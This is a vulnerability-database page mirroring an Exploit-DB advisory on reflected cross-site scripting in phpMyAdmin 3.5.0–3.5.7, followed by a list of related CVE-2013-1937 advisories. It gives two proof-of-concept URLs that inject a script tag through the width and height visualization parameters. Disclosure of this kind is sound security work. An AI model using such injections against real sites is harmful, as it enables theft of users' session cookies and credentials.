Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbWaraxeEDB-ID:38440
HistoryApr 09, 2013 - 12:00 a.m.

phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross-Site Scripting Vulnerabilities

2013-04-0900:00:00
waraxe
www.exploit-db.com
17

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/58962/info

phpMyAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

phpMyAdmin 3.5.0 through versions 3.5.7 are vulnerable. 

http://www.example.com/PMA/tbl_gis_visualization.php?db=information_schema&token=17961b7ab247b6d2b39d730bf336cebb&visualizationSettings[width]="><script>alert(123);</script>

http://www.example.com/PMA/tbl_gis_visualization.php?db=information_schema&token=17961b7ab247b6d2b39d730bf336cebb&visualizationSettings[height]="><script>alert(123);</script>

Related

prion 1
nessus 8
openvas 7
debiancve 1
fedora 3
phpmyadmin 1
cve 1
freebsd 1
cvelist 1
ubuntucve 1
nvd 1
gentoo 1
prion
prion
Cross site scripting
2013-04-16 14:04:00
nessus
nessus
phpMyAdmin 3.5.x < 3.5.8 tbl_gis_visualization.php Multiple XSS
2013-04-24 00:00:00
Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2013:144)
2013-04-20 00:00:00
Fedora 17 : phpMyAdmin-3.5.8-1.fc17 (2013-5623)
2013-04-23 00:00:00
openvas
openvas
Fedora Update for phpMyAdmin FEDORA-2013-5623
2013-04-25 00:00:00
phpMyAdmin Multiple XSS Vulnerabilities (PMASA-2013-1) - Linux
2017-08-21 00:00:00
phpMyAdmin Multiple XSS Vulnerabilities (PMASA-2013-1) - Windows
2017-08-21 00:00:00
debiancve
debiancve
CVE-2013-1937
2013-04-16 14:04:31
fedora
fedora
[SECURITY] Fedora 18 Update: phpMyAdmin-3.5.8-1.fc18
2013-04-21 23:54:37
[SECURITY] Fedora 19 Update: phpMyAdmin-3.5.8-1.fc19
2013-04-22 00:40:39
[SECURITY] Fedora 17 Update: phpMyAdmin-3.5.8-1.fc17
2013-04-21 23:55:29
phpmyadmin
phpmyadmin
XSS due to unescaped HTML output in GIS visualisation page.
2013-04-18 00:00:00
cve
cve
CVE-2013-1937
2013-04-16 14:04:31
freebsd
freebsd
phpMyAdmin -- XSS due to unescaped HTML output in GIS visualisation page
2013-04-18 00:00:00
cvelist
cvelist
CVE-2013-1937
2013-04-16 10:00:00
ubuntucve
ubuntucve
CVE-2013-1937
2013-04-16 00:00:00
nvd
nvd
CVE-2013-1937
2013-04-16 14:04:31
gentoo
gentoo
phpMyAdmin: Multiple vulnerabilities
2013-11-04 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:38440
prion1nessus8openvas7debiancve1fedora3phpmyadmin1cve1freebsd1cvelist1ubuntucve1nvd1gentoo1